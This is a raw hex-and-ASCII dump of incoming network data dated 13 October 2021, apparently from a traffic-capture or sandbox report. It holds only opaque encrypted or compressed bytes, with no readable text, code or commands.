                                                                          Data Ascii: UA08/OH"r@BTXW>$mEb"Bv/u\k04DKqSfIr~|@]mz1&#}{K>mJE646'"->GF-]0B!bIBw *T ^j>F26V^;(o:zqqX +xQs@u
                                                                          2021-10-13 14:18:11 UTC167INData Raw: c7 17 29 be af 8c b0 44 eb 68 1f d2 9a a1 ca ef bd c4 26 78 85 0b 04 bc 1d 41 c1 a3 e6 6a 2f 76 5a 0d 51 0f 8d db 7a 66 90 9c 57 7b 4e 16 d1 6a 4f 80 6d 36 35 64 24 75 6f 2b 06 c8 23 73 e9 43 70 84 1e 51 97 09 8b b3 65 16 38 b7 b4 ef 79 34 73 77 01 12 d4 dc 82 4a 73 5a fe f0 a5 6c ee 9c 48 e4 6d f6 02 82 ed c0 34 5e 84 39 c1 f4 73 b0 e8 92 7f 38 d0 99 e1 66 71 ec c1 0c 85 ed ad bc 97 4b 81 fd 88 a3 66 e0 6d 50 32 31 92 d9 f4 e1 7e 6e 15 47 c5 6a e5 df 1c cc bf bb e2 73 5b 4a 15 32 ff ab c7 c5 28 cb e4 62 ee cc f2 26 60 80 eb 2d 79 e5 1c 3f 39 e2 ed 5a 9a 87 0d b8 f7 95 18 11 52 16 83 83 d5 b8 c2 c8 7c 99 8e a0 7b 79 0e 49 0c e8 60 0f d5 fc 5f d5 45 6f 18 13 88 b6 72 9e bb d4 12 7c d7 37 da e9 0a c8 bb de 0c 9e b0 d0 f4 49 67 81 1b 94 4c 73 4b a0 ae a8 56
                                                                          Data Ascii: )Dh&xAj/vZQzfW{NjOm65d$uo+#sCpQe8y4swJsZlHm4^9s8fqKfmP21~nGjs[J2(b&`-y?9ZR|{yI`_Eor|7IgLsKV
                                                                          2021-10-13 14:18:11 UTC169INData Raw: 4d ca f0 bf 25 e3 48 d6 bc 3b e4 2c fd 8b b4 73 88 1f 42 43 d4 1a bf 0a ee eb bf a5 3f fc fd f9 45 f5 a3 d4 ef f1 4e 23 06 e1 13 83 75 06 5d d1 16 6a cf 61 71 f7 c5 1e 0d 29 45 5b 73 75 e6 90 5b ee 26 fb 95 4d 6d 73 7e a6 40 8b 8a ec 02 7c 76 fb de b3 ce 1e cf 8d e7 00 43 b0 9b 24 1a 15 1b 18 22 31 af 3f b8 22 fd 52 6c 20 91 b5 8e 1d e8 1e c9 cf 3e 1b ec 59 54 d4 a1 c2 d3 a9 15 af 8a f5 e1 11 ab f6 bf 1f 59 2e aa 09 0c fa 7e 8a 45 40 ee ec a3 ba 9a 7a 6f 57 95 2f f3 45 dd c7 97 43 97 5f 5a 8f 2a d9 d6 4f c0 8d 26 39 1a 02 20 16 be e1 df b8 dd 2c 4e 04 65 64 69 26 21 b0 a2 1e 9a 26 e7 4d ac 72 bb bf d5 da 5a ef 01 cc cc 6f f6 ef b7 4a fd b3 ae 77 48 5d ba 6a 5b b0 68 c6 d2 99 d2 b6 34 5a 11 87 3f 22 1b be 14 e0 0a b1 33 0c 93 e5 89 ee 18 89 19 8a c5 b6 ca
                                                                          Data Ascii: M%H;,sBC?EN#u]jaq)E[su[&Mms~@|vC$"1?"Rl >YTY.~E@zoW/EC_Z*O&9 ,Nedi&!&MrZoJwH]j[h4Z?"3
                                                                          2021-10-13 14:18:11 UTC170INData Raw: 79 32 0b 04 bc 9e 52 56 0c de 9b 3c 50 4e e7 e6 0f 8d db 3c 77 cf e1 1c 8a 5d 30 99 34 f6 80 6d 36 24 77 b3 a8 07 da 15 ee bb 25 52 43 70 84 1f 42 00 97 e7 42 76 30 8c 95 b4 ef 79 b4 75 7e 01 a0 c6 54 93 6c cf bc 43 f0 a5 6c ed 87 58 79 fc a8 0b a8 59 92 8a 5e 84 39 c7 ff 53 85 ef 62 6c 12 c8 4a 21 66 71 ec d0 07 a3 01 29 b9 81 61 81 e1 4a a3 e6 e0 7b 63 a5 68 e7 2b e7 cb 7e ce d7 47 45 6a f3 ec 8b 3e d5 49 f1 59 b7 4a d6 32 ff ab d6 de ca 57 84 90 fc e6 d2 ab a3 80 cb 2d 68 fe f7 02 ba 10 ff 70 5e 8e c9 b8 f7 95 09 0a fc be 19 71 c7 92 3a 5d b8 99 ae a0 6a 62 b9 0f 98 1a 72 25 45 ee 9a d5 45 6f 0e 00 1f 4b cd 6c a9 fe 1a e3 12 37 da e9 1c db 2c a4 89 6e a2 fa b4 5e a1 81 1b 94 5a 60 bc 80 d6 5b 44 6f 85 78 0f e3 22 3e 93 9d 83 e7 8e 2a 47 aa c2 5d 8f d3
                                                                          Data Ascii: y2RV<PN<w]04m6$w%RCpBBv0yu~TlClXyY^9SblJ!fq)aJ{ch+~GEj>IYJ2W-hp^q:]jbr%EEoKl7,n^Z`[Dox">*G]
                                                                          2021-10-13 14:18:11 UTC171INData Raw: 42 54 1a a9 2c 71 99 78 87 24 d1 fd 11 79 f4 23 d4 f9 d7 d1 5e d8 75 0d ae 75 f2 61 d0 96 6a d9 47 ee 3a 31 3c 11 07 45 73 4e 74 66 90 48 c8 b9 2e 95 d8 70 5d 7e 92 7d 8a 0a ec 14 5a e9 4b cb 90 d0 31 cf e5 da 01 c3 b0 8d 02 e5 de 1f 8d 00 1e af 4b 85 23 7d 52 7a 06 0e b9 ad 67 cd 2e c9 67 03 1a 6c 59 47 f2 3e ea e7 07 29 9f 92 c7 dc 10 ab f6 a9 19 c6 42 f4 9d 2a cb fa e4 78 41 ee ec b5 bc 05 02 01 fe b9 1e cb 3a e0 c6 97 43 81 59 8e 07 3c 6a e9 7d 44 26 18 38 1a 02 36 10 29 79 55 00 e2 1e a6 b6 5b 65 69 26 37 d6 36 cd 01 90 d8 7e e4 c2 85 be d5 da 4c eb 8e ed 59 d9 c9 da 3b 0a c3 b2 ae 77 5e 5b 25 72 bc 98 4e f1 72 ef ec b7 34 5a 00 81 a0 14 da 4d 36 d7 9e 32 0c 0d 93 e5 98 e8 87 e8 30 77 fb 8e aa c4 91 8b 03 45 af 2e 78 5d 2e 64 c3 58 5c 48 c6 cd bb b8
                                                                          Data Ascii: BT,qx$y#^uuajG:1<EsNtfH.p]~}ZK1K#}Rzg.glYG>)B*xA:CY<j}D&86)yU[ei&76~LY;w^[%rNr4ZM620wE.x].dX\H
                                                                          2021-10-13 14:18:11 UTC173INData Raw: 3c 64 c9 81 31 72 64 08 ce 48 df d3 6c 36 24 64 b5 7c 4e 22 2a d6 ec 51 75 10 71 84 1f 51 06 00 5d a1 a3 15 db 95 64 bc 78 34 75 6f 27 3f 06 cf f3 4f 98 78 22 a3 a4 6c ed 94 59 ee 6a f7 94 9d 0e e2 4c 0a 85 39 c7 ec 52 95 6c 93 da 27 9f ba d5 30 70 ec d0 14 a2 c8 bc bd 38 54 d6 fd e4 f5 e7 e0 7b 70 a4 30 04 dd 4c fe 29 6e fd 11 44 6a f3 ff 8a cd 40 b8 36 6c e0 6e 7d 51 fe ab d6 cd cb eb 66 66 a7 ec 85 03 64 eb ca 2d 68 ed f1 1f 2e e1 37 5f 09 a2 21 d6 f6 95 09 19 fa 01 98 80 f8 b9 6d ed 18 f7 af a0 6a 71 bf 5e 5f eb 09 07 12 da b7 bb 44 6f 0e 13 19 b7 4c 9d d4 f4 4d 5b 37 58 db e9 1c c8 2a df 7d 98 64 c3 e3 62 6b f0 1a 94 5a 73 ba a6 36 ad fb 40 d2 4c a2 92 23 3e 93 8e 85 5a ad ff 96 80 95 d1 f7 f1 66 d1 8d ba 28 d0 3b f7 db 09 98 98 32 ac c1 cd 3c 59 10
                                                                          Data Ascii: <d1rdHl6$d|N"*QuqQ]dx4uo'?Ox"lYjL9Rl'0p8T{p0L)nDj@6ln}Qffd-h.7_!mjq^_DoLM[7X*}dbkZs6@L#>Zf(;2<Y
                                                                          2021-10-13 14:18:11 UTC174INData Raw: d8 22 60 ec c0 87 0f 06 09 60 97 6a d9 41 e7 f6 1f 15 35 2d 3f 5b c7 57 66 90 48 ce b7 e2 b6 65 60 73 04 a6 14 38 0b ec 14 5c a7 f8 8c ab 98 1f b5 8d 6f b3 c2 b0 8d 04 eb 0b 27 30 10 31 d5 3f 10 91 7c 52 7a 00 00 b4 38 11 da 1e b3 cf be ae 6d 59 47 f4 30 c3 72 a5 5c 88 e8 73 c9 a7 aa f6 a9 1f c8 2f 05 02 3e fa 80 0c 3d f6 ef ec b5 ba 0b 7b 90 5b 3c 38 b1 c2 75 7f 96 43 81 5f 80 86 e4 db e7 4f 3f 0a 5e 83 1b 02 36 16 20 e3 64 b2 b6 2d dd 83 39 d9 68 26 37 b0 33 1f f0 2d 0b 49 9f fa c7 7f d4 da 4c ef 97 cd eb 63 33 e6 40 c2 49 91 ae 77 5e 5d 2b 73 b5 98 59 c6 09 13 1a 76 35 5a 00 87 be 23 64 b2 d1 e2 e5 3a 7b cd 92 e5 98 ee 9e 88 ea 82 89 b5 d1 f8 5e 4b 02 45 af 28 61 21 c7 98 38 62 27 00 3d 0e ba b8 7a 03 fe 25 85 9c 95 8c ff b2 91 17 b1 5f c9 5f d8 f0 11
                                                                          Data Ascii: "``jA5-?[WfHe`s8\o'01?|Rz8mYG0r\s/>={[<8uC_O?^6 d-9h&73-ILc3@Iw^]+sYv5Z#d:{^KE(a!8b'=z%__
                                                                          2021-10-13 14:18:11 UTC175INData Raw: 3a 10 2e b9 2c e9 7f 8d 85 1f 51 00 9e e5 7b 65 f0 8e e8 b4 ba 84 35 75 6f 21 a1 c7 84 94 ac cd 05 fe 9d 58 6d ed 94 58 78 fd 05 02 64 5b 9f 34 d8 79 38 c7 ec 53 03 fb 2e 68 de ca c7 e1 c4 8c ed d0 14 a3 5e 2b a1 96 ad 83 80 88 1d 1b e1 7b 70 a5 a6 f3 64 e0 07 7c 13 15 9d b8 6b f3 ff 8b 5b d7 e8 e3 95 b5 13 15 c4 02 aa d6 cd ca 7d 91 9c fb 2a d0 7e 60 91 35 2c 68 ed f7 89 b9 9b ed bc 5c df 0d 94 09 94 09 19 fc 97 0f a7 c1 5e 38 90 7c d1 50 a1 6a 71 b9 c8 9b 4f 60 e9 47 a7 5f b6 bb 6e 0e 13 1f 21 db 22 af 32 18 26 d7 48 24 e8 1c c8 2c 49 8a 71 b0 36 b6 1f 67 1a e5 95 5a 73 bc 30 c1 14 4c a3 87 31 c6 55 dc 3f 93 8e 83 d4 8d c3 52 66 c0 ac 43 01 98 d0 8d ba 2e 5e 1b 28 d2 ef cd e5 2e 30 3e cc 3c 59 06 28 5c ae f8 3b 49 88 3e 00 54 f9 e4 27 dd 5c 20 1d 8b c7
                                                                          Data Ascii: :.,Q{e5uo!XmXxd[4y8S.h^+{pd|k[}*~`5,h\^8|PjqO`G_n!"2&H$,Iq6gZs0L1U?RfC.^(.0><Y(\;I>T'\
                                                                          2021-10-13 14:18:11 UTC176INData Raw: cf 47 26 73 44 61 92 48 ce b1 6c 96 9c 47 95 7c db 40 c7 0d ee 14 5c e1 6c d3 f8 d0 f8 cd f0 e7 68 c4 b2 8d 04 ed 85 07 90 05 d7 ad 42 b8 a1 7a 50 7a 00 06 22 af 89 c8 f8 cb b2 3e 84 6b 5b 47 f4 36 55 e5 5d 32 49 90 0e e1 aa ac f4 a9 1f ce b9 f2 cf 2c 1c f8 71 45 97 e9 ee b5 ba 0d ed 07 75 b3 c9 c9 bf dd 35 90 41 81 5f 86 10 20 22 f5 a9 46 77 26 37 12 00 36 16 21 75 49 05 f8 ca a4 fe 65 4d 61 24 37 b0 35 89 07 41 c7 ab e6 87 bb fa dd d8 4c ef 96 5b 7c bc dd 09 39 bf fd d3 a6 75 5e 5d 2d fd 95 1c 48 20 70 6e d2 ca 3c 58 00 87 a8 b5 f3 a1 23 06 9c 47 33 94 9b e7 98 ee 8f 1e 1d 4f e4 50 a8 85 ae 3e 0b 47 af 28 70 b7 03 c3 ca 86 5e 7d f9 03 b3 ba 7a 03 ef b3 a8 6e 71 68 86 cf 39 3f b8 5d c9 5f ce 66 86 f7 cf 0c 33 93 38 01 5e dc e1 eb ea 5e 4d c2 28 e4 42 c2
                                                                          Data Ascii: G&sDaHlG|@\lhBzPz">k[G6U]2I,qEu5A_ "Fw&76!uIeMa$75AL[|9u^]-H pn<X#G3OP>G(p^}znqh9?]_f38^^M(B
                                                                          2021-10-13 14:18:11 UTC178INData Raw: c9 ef b3 26 77 6f 21 37 51 dc ea 4f 29 7a 83 f0 49 7e ef 94 58 ee 6b f6 d3 b2 bf e0 49 5e 8a 2a c5 ec 53 95 6d 92 df 3d 2e b8 9c 66 41 ff d2 14 a3 c8 bd bc 68 7b 67 ff f5 a3 b4 f3 79 70 a5 30 65 db 3a e4 98 6c 68 47 31 79 f1 ff 8b cd 41 b9 c7 42 51 6c 68 32 69 b8 d4 cd ca eb 07 60 ea ca 34 01 1d 80 73 3e 6a ed f7 1f 2f e0 12 6b b8 a0 70 b8 2d 86 0b 19 fc 01 99 81 e7 be dc ef 01 99 52 b3 68 71 b9 5e 0d ea 15 3d a3 d8 22 d5 5b 7b 0c 13 1f b7 4d 9c e3 d2 fc 59 aa 37 9a fd 1e c8 2c df 1c 9e 6c e4 52 60
                                                                          Data Ascii: &wo!7QO)zI~XkI^*Sm=.fAh{gyp0e:lhG1yABQlh2i`4s>j/kp-Rhq^="[{MY7,lR`
                                                                          2021-10-13 14:18:11 UTC178INData Raw: 1a 81 79 80 58 73 bc a6 57 ab 1c 44 63 4e bb e3 a6 2a 91 8e 83 42 1b da de 86 24 d3 3e d3 c0 c5 8f ba 2e c8 8d d2 54 08 29 9a 53 de 08 d9 3e 59 06 be ca ed 00 db ad f7 43 0a 41 ec e6 27 dd ca b6 d0 5a 20 c9 1d de 9b ce 3e 86 dc 01 a6 61 46 15 85 c9 c0 f3 f8 f9 27 1d 56 9f 48 27 c7 3e dd dc 26 14 b5 7b 3f ff 36 a9 b8 a9 c4 37 de 70 67 ee ca 37 0f 21 9b d5 30 84 66 3b 45 7a 37 af 08 5e 71 0a e1 34 14 1d 31 b7 53 7c a5 4e 72 f8 d3 e0 ef 4b d2 df 0a fd 6b d5 86 77 29 d4 f7 e5 e8 7a 4b 3b 81 a9 97 ca fd 16 fa 9f cb 83 72 eb 0e 2d ee d2 1b 42 57 cb c4 3c ea 8f c4 cf fa be 1b c0 1d d3 2b 21 57 f4 e6 bd 25 e3 c8 40 aa e3 71 cb 26 fa ae 13 9e 1d 42 43 54 8c a9 eb 6c 0c 55 d4 25 7e eb fb 45 f5 23 42 f9 f3 da c4 f5 90 0e 27 63 04 5d d1 96 fc d9 85 f0 10 30 6f 10 ef
                                                                          Data Ascii: yXsWDcN*B$>.T)S>YCA'Z >aF'VH'>&{?67pg7!0f;Ez7^q41S|NrKkw)zK;r-BW<+!W%@q&BCTlU%~E#B'c]0o
                                                                          2021-10-13 14:18:11 UTC179INData Raw: 04 c5 9a ee 8f 88 8b 84 30 86 4c fa d3 8a bb 65 ad 28 70 21 95 99 7b 65 ba 02 84 cc 61 98 78 03 ef 25 3e 9b 73 bf 62 b0 44 d4 4c 7f cb 5f ce f0 10 49 15 ef d7 ec 45 07 49 ff e3 eb ea c8 db dd 01 33 a6 bd b3 1b 7b 49 37 0c eb 6b a0 2c c3 9f ed 81 0c 36 7f 10 e7 c4 de ec d1 88 65 d6 51 79 12 76 66 f5 fc 99 70 48 ae 7e c9 50 0b 39 c0 4d fb 5a d5 8d a4 56 e6 e1 76 bd 2c 65 aa 00 1b 46 ba 2d f4 8d a3 a1 23 b8 d0 58 75 5d ea 11 bd ec e0 06 16 85 6a 59 07 71 08 c6 e4 49 a4 3d 44 1b a4 96 2a 7e ff e6 26 5a 8b 30 6d f8 8a 6e 1e a2 da 70 05 14 55 be 4a 8f b2 44 eb 68 cf d0 25 aa 02 ec c2 c4 95 7b 87 0b 04 bc 08 41 a9 a4 3f 69 50 76 df 0d 53 0f 8d db aa 64 1e 88 f8 78 31 16 2a 6a 4d 80 6d 36 b2 64 86 73 e8 28 79 c8 6e 73 eb 43 70 84 89 51 fe 09 03 b0 1a 16 7a b7 b6
                                                                          Data Ascii: 0Le(p!{eax%>sbDL_IEI3{I7k,6eQyvfpH~P9MZVv,eF-#Xu]jYqI=D*~&Z0mnpUJDh%{A?iPvSdx1*jMm6ds(ynsCpQz
                                                                          2021-10-13 14:18:11 UTC180INData Raw: 8c 83 42 8d 4c 56 17 c6 37 41 ae 66 28 a1 b8 2e c8 1b 44 c8 12 ee 7e 2c a3 c0 d7 11 5b 06 be 5c 7b fc 1c 4f 13 3c 77 ab c4 c9 25 dd ca 20 46 94 6f 0e f9 a1 e6 c2 75 a9 de 01 a6 f7 d0 27 69 2b 24 8c 85 d7 b2 32 54 9f 48 b1 51 c5 64 1b c2 6b c8 2b 88 d0 34 a9 b8 3f 52 84 c5 93 83 91 b7 45 de 0e 99 d5 30 12 f0 4c fe b9 d3 d0 75 ca 82 25 e3 34 14 8b a7 56 1c 9f 41 31 0f 4e ce cc ed 4b d2 49 9c 59 69 1e 62 08 54 0c cb c9 ea 7a 4b ad 17 bc f3 29 19 69 87 65 94 af 70 eb 0e bb 78 1c c0 94 b3 b4 b9 20 97 a3 c6 cf fa 28 8d 9d a1 30 cf 5e 2a ca 7c 91 27 e3 c8 d6 3c 1b 70 1c c2 85 d3 73 26 31 40 43 54 1a 3f 2a ab ef b1 ab 58 fc 2d d7 47 f5 23 d4 6f d1 f4 13 11 ef 73 83 87 28 5f d1 96 6a 4f 41 eb f0 d4 10 6d 29 56 74 71 75 66 90 de ce b3 c8 70 42 0e 73 4b 89 42 8b 0a
                                                                          Data Ascii: BLV7Af(.D~,[\{O<w% Fou'i+$2THQdk+4?RE0Lu%4VA1NKIYibTzK)iepx (0^*|'<ps&1@CT?*X-G#os(_jOAm)VtqufpBsKB
                                                                          2021-10-13 14:18:11 UTC182INData Raw: 21 03 0f de 7f 4b e6 fb b1 bb 9c 43 01 ef 25 a8 0d 73 10 87 54 3b a9 b0 1a f0 5d ce f0 86 df da 67 26 08 3a 7a 57 b9 d8 e9 ea c8 4d 4b 2b ea 43 59 cc 66 3b e1 0c 0e eb 6b 36 ba c9 82 12 65 73 4b 1e 9b dc c6 de ec 47 1e 9a f5 b3 9d 6d 0b e5 18 c7 9b 70 48 38 e8 fd f9 f7 dd bf 30 5e 95 ee 8f a4 56 70 77 f4 b3 ce 81 d5 7d dc 77 82 2f f4 8d 35 37 7d cf 2d bc 0a 20 02 02 85 ee e0 06 80 13 88 1d e5 95 77 bb ed 38 9c 3f 44 1b 32 00 66 7e 39 02 59 27 a0 66 55 fa 8a 6e 88 34 51 ec e7 f0 2a c3 07 38 8a 46 eb 68 59 46 ba 8a c5 08 bd b9 fa ef bf 09 04 bc 9e d7 56 66 dd 8d 2f 0b 4e f7 6b 0d 8d db 3c f2 cf d8 3f 9c 4e 6b 99 b1 75 82 6d 36 24 f2 b3 9a 0a cc 06 b5 bb 4b d2 41 70 84 1f c7 00 66 c1 54 65 6b 8c ae 8f ed 79 34 75 f9 21 28 c2 3a 82 37 cf 24 c5 f2 a5 6c ed 02
                                                                          Data Ascii: !KC%sT;]g&:zWMK+CYf;k6esKGmpH80^Vpw}w/57}- w8?D2f~9Y'fUn4Q*8FhYFVf/Nk<?Nkum6$KApfTeky4u!(:7$l
                                                                          2021-10-13 14:18:11 UTC183INData Raw: 5e 09 57 9a c8 dc bd cd 6a 1c 04 be 5c ed 6a dd b4 ff d8 08 d6 f8 93 62 df ca 20 d0 02 21 ea 1d 45 99 bf 2b 1d 99 03 a6 f7 46 b1 82 7b d6 68 fa aa 32 a5 13 9d 48 b1 c7 53 dc d5 26 8f b7 56 2a 21 73 ab b8 3f c4 12 d9 12 71 75 c8 38 1a dd de d7 30 12 66 da 47 85 36 34 0a b7 64 28 a7 36 14 8b 31 c0 5a 7f b2 d5 70 33 c6 a3 a9 49 d2 49 0a cf 69 7e 87 ec 2b 71 e2 85 ae 78 4b ad 81 2a 83 c9 e9 8d f8 18 de 02 34 e9 0e bb ee 8a 19 d3 56 50 c6 5d fc 29 82 cd fa 28 1b 0b 09 17 3e ba 55 b7 f0 79 63 e1 c8 d6 aa 8d 73 8c 27 61 ac 0e 88 f7 04 41 54 1a a9 bc 79 7a 40 4f 27 81 fd f3 02 f7 23 d4 f9 47 d9 c9 f4 0b 0c fe 75 2a 1a d3 96 6a d9 d7 e6 e8 2b f4 12 54 45 15 34 77 66 90 48 58 b1 ef 92 a6 71 0e 7e d6 07 89 0a ec 14 ca e1 48 c9 58 d3 63 cf 1c a0 02 c3 b0 8d 92 ed 2c
                                                                          Data Ascii: ^Wj\jb !E+F{h2HS&V*!s?qu80fG64d(61Zp3IIi~+qxK*4VP])(>Uycs'aATyz@O'#Gu*j+TE4wfHXq~HXc,
                                                                          2021-10-13 14:18:11 UTC184INData Raw: be 80 df d6 cd 5f 4d 0e cc f0 86 49 4c ea 63 e8 de 05 2a de 47 ba e8 c8 4d dd bd 02 96 8b 28 19 46 68 fd 5d e9 6b 36 2c 5f 99 76 82 97 34 63 31 0f 95 dc ec 47 88 0c e7 1b 7d 89 74 98 d4 f5 cb 72 48 38 7e 6b 56 2d 3a 5b 4f 23 7b fa df a6 56 70 e1 62 8f ea 60 31 02 a1 67 f7 7f f6 8d 35 a1 eb be c4 5b ee 5f 7f 30 cf be e2 06 80 85 1e 6d b7 74 93 c4 90 6b 34 6f 46 1b 32 96 f0 7f 7d e6 bd 58 dd 12 dc aa 88 6e 88 a2 c7 76 e2 1f ce bc 7a ad 65 16 e9 68 59 d0 2c ab 7f ec 59 c6 87 59 73 59 06 bc 9e 41 c0 a2 f3 60 cb 74 33 2f 46 5c 8f db 3c 64 59 89 d6 78 aa 14 e4 48 77 d3 6f 36 24 64 25 74 59 3e e2 ca c6 51 b0 10 72 84 1f 51 96 08 17 b0 81 14 f1 95 cf bc 7b 34 75 6f b7 37 40 c8 66 48 b2 78 62 a3 a7 6c ed 94 ce ee e1 f5 e6 80 24 e2 89 0d 86 39 c7 ec c5 95 13 87 9b
                                                                          Data Ascii: _MILc*GM(Fh]k6,_v4c1G}trH8~kV-:[O#{Vpb`1g5[_0mtk4oF2}XnvzehY,YYsYA`t3/F\<dYxHwo6$d%tY>QrQ{4uo7@fHxbl$9
                                                                          2021-10-13 14:18:11 UTC185INData Raw: ec a9 85 e4 9e 80 c8 20 d0 94 b7 2f d8 88 7d c0 56 84 07 5c a4 f7 46 27 14 2f a6 8b 1e d5 4f 1f ab c2 4a b1 c7 c5 4a 3a e9 59 53 29 57 fd 29 f7 ba 3f c4 84 4f 96 eb 96 2c 47 67 23 db 8b 32 12 66 4c d1 9c c2 e2 ee c8 19 08 83 6a 16 8b 31 56 cc 9a 61 36 94 4c bb e2 6b 15 d0 49 0a 59 ff 33 a5 3b cf 0e 9f e7 4e 24 49 ad 81 bc 15 2c fe 6d 1c 67 a3 81 ba b5 0c bb ee 1c 8f a4 a0 87 22 22 81 8d 2d 91 f8 28 1b 9d 9f 35 02 5a b1 c8 8d bf 2f bc ca d6 aa 1b e5 2d 19 b5 48 71 f5 1f 6e 1c 56 1a a9 2a ef ea 02 af c3 fe 80 f9 0b aa 21 d4 f9 d1 4f 22 2e d9 e8 81 08 06 2d 8e 94 6a d9 41 70 f6 b2 13 f6 2b 38 5b e1 2a 64 90 48 ce 27 fa 39 46 95 71 03 a6 f4 d4 08 ec 14 5c 77 fa 10 bf 37 1c b2 8d 31 5f c1 b0 8d 04 7b 13 24 12 e5 33 d2 3f 4f 7d 7f 52 7a 00 90 b4 5a 11 2f 1c b4
                                                                          Data Ascii: /}V\F'/OJJ:YS)W)?O,Gg#2fLj1Va6LkIY3;N$I,mg""-(5Z/-HqnV*!O".-jAp+8[*dH'9Fq\w71_{$3?O}RzZ/
                                                                          2021-10-13 14:18:11 UTC187INData Raw: 77 e1 21 c1 28 4f dc 2a 26 4d 59 cc 1a 3a 56 38 ea e9 c2 36 e6 e2 73 09 42 71 16 3b 22 e5 cd df cc 62 79 98 26 b7 f1 67 81 e7 15 fe c8 78 b6 39 bf fd c4 f5 c5 bf 8c 5e 5b f8 9e a4 47 71 b0 e1 8c c9 7e d6 95 f7 6d bb 34 f5 58 06 ae 7e 97 37 cf 23 57 01 01 be ca f6 dd 82 4c 88 04 c6 65 76 0f ed 31 aa 21 47 22 33 03 6a 36 18 2d 5b 25 b9 01 6f b9 8b c4 ac 80 52 37 e2 8e 0c 38 07 84 b1 ed fb 40 5a f9 bb 22 d7 c3 bc ed fb cf a2 3f 07 ed 9f ce 75 9e da b2 2d e8 7c 6f 52 d6 8d 9a 2f 23 cc 50 1e 31 5c 05 99 29 4e 91 76 3c 27 05 b2 8d 2c 67 07 a1 ba dd f6 c5 70 f5 1e 71 25 1b e5 d3 66 49 99 cc b7 6e 78 df 7a 31 22 b6 c6 36 ab 2e cc f1 ff 36 81 25 ec 05 59 7e f6 9c 03 3b 58 88 24 da 87 f8 c6 81 7b 1e f8 0b 7c 65 e0 2b e2 ff 70 82 c3 ea a2 51 2a 59 ba d3 82 64 89 43
                                                                          Data Ascii: w!(O*&MY:V86sBq;"by&gx9^[Gq~m4X~7#WLev1!G"3j6-[%oR78@Z"?u-|oR/#P1\)Nv<',gpq%fInxz1"6.6%Y~;X${|e+pQ*YdC
                                                                          2021-10-13 14:18:11 UTC188INData Raw: 8e af 30 4e f6 81 54 f2 c7 f9 1e 32 fa 51 ad 41 60 c5 e2 c8 02 2d a0 b5 b2 21 c3 3f 90 bb 1f e1 1c da 77 66 2c e7 07 13 1a 98 27 03 3c 67 a5 44 d7 15 82 01 23 67 57 ec 7d 15 22 31 3f 7e d3 a6 9a 72 3c d3 99 e6 62 d2 d4 03 d9 60 c2 87 bb 36 29 e6 16 eb ea 54 88 85 bd 87 73 ea 22 fb 94 dd d0 65 ce 0a 4a ed bc 06 81 51 1f c4 55 df c4 c5 2e f9 97 36 00 00 84 29 e0 57 0e f9 b6 21 6a fb 1d a3 aa 73 84 24 5f a7 9a 8a 8d 48 eb 51 f3 ab 42 6c 35 5e 40 27 94 e8 1e 4c a1 23 db f1 53 de 93 f7 b2 1b 35 71 af 5d 4f be b3 dc 10 e4 d6 17 ae 14 80 45 af 58 5e 6c 1c 48 29 83 c3 9c cc 73 07 64 99 4a 22 0a b3 01 15 e0 6b d2 02 d1 58 c5 84 e3 89 f0 fb 87 1d e9 33 22 a9 07 00 ab c3 ad be 77 73 7e 20 23 08 ab 81 c8 12 da 6c 34 32 68 79 62 e7 36 fa e1 84 11 bc 92 3a e5 87 99 4a
                                                                          Data Ascii: 0NT2QA`-!?wf,'<gD#gW}"1?~r<b`6)Ts"eJQU.6)W!js$_HQBl5^@'L#S5q]OEX^lH)sdJ"kX3"ws~ #l42hyb6:J
                                                                          2021-10-13 14:18:11 UTC189INData Raw: d9 39 e8 9f 2b a6 62 36 3f 37 e1 cc 1e ec 76 8e 53 c1 f1 6d 46 70 cb c0 b2 8f 41 4e 30 5b 6e 51 dc 3d c9 57 0d 6d ee 8b c9 66 39 e0 fd 8b c1 73 53 16 05 67 80 3e 04 9b d4 a3 6a ab ed 58 a1 5d b6 19 9d fb 71 02 2c 82 af 7a 48 73 48 d2 65 7c 0f 3d 24 29 f1 81 37 7e 21 f7 93 4d e1 14 06 f1 45 79 c1 a4 2a 52 14 01 b9 bf 58 b8 6b 46 7a 69 e5 d0 fb b3 75 ea 61 c1 1f 4c 2c 0b 39 a8 31 59 ff a2 12 46 c2 6e 5f 2e 3e 23 48 de ad 65 b1 a8 fb 6f 2d 10 b9 6d 5c 80 8c 37 04 41 a1 6e 1f 2b 57 d0 38 57 f8 42 3f ae 9c 57 41 0a 9a 96 55 12 85 90 5b fc 6a 34 74 6a e9 15 76 c6 f1 4c 14 56 26 f3 d4 6a 53 bd ef f4 54 f6 20 a7 9b f8 0d 5d c6 30 cb f7 e2 95 da 93 63 23 34 ba c1 43 62 ec d4 15 83 ed 53 bb 69 4b 8e f5 0a a4 1a e0 b8 5e 8b 31 a2 da 30 ef 42 6d e9 47 31 70 95 f9 8f
                                                                          Data Ascii: 9+b6?7vSmFpAN0[nQ=Wmf9sSg>jX]q,zHsHe|=$)7~!MEy*RXkFziuaL,91YFn_.>#Heo-m\7An+W8WB?WAU[j4tjvLV&jST ]0c#4CbSiK^10BmG1p
                                                                          2021-10-13 14:18:11 UTC191INData Raw: 25 3a 96 67 53 29 eb fe ee 85 45 1e 0d 83 f9 b3 76 93 03 42 08 2f bd d5 19 13 06 7c af 9f fc d5 22 df aa 0c 98 31 60 91 8a 71 4b 9b 35 1f b7 4b 17 e5 85 5b 0c 6e bb 59 36 26 60 2d f0 0b 88 f7 04 5d aa aa a1 99 43 2c 1e 6c 46 43 d0 85 5b e9 e1 9d eb 34 f0 a3 21 ac cf 08 0d 8a d7 dc 63 2f 32 9f 7d 2f 09 58 46 c8 a1 af 36 e3 a1 d5 22 37 f3 21 7d 86 f1 66 46 1b 06 42 74 3f ba 2a 35 eb 77 8c 36 fc d4 f8 b1 f2 9d fc 40 d6 38 3b 54 ee b7 84 76 15 98 f9 d2 6b d6 49 64 f1 76 13 48 1b 9f 5c 3f 74 a5 be 66 cf b8 fe f8 6f ba 5b 2a a7 60 ae ca e7 58 5d ee f2 51 b9 d8 1a ad 9d 3a 28 9f b1 82 0c 6f 14 5b 14 c0 1f 81 3e e4 23 09 48 1c 06 5a b5 8f 35 da 1e f0 cc ef 30 f7 70 7e f7 60 d5 cb a5 0d ac 07 60 42 38 f7 f7 a1 3a 09 28 96 05 b7 d4 6a 0c 21 41 df dc 90 be 0c 7f 99
                                                                          Data Ascii: %:gS)EvB/|"1`qK5K[nY6&`-]C,lFC[4!c/2}/XF6"7!}fFBt?*5w6@8;TvkIdvH\?tfo[*`X]Q:(o[>#HZ50p~``B8:(j!A
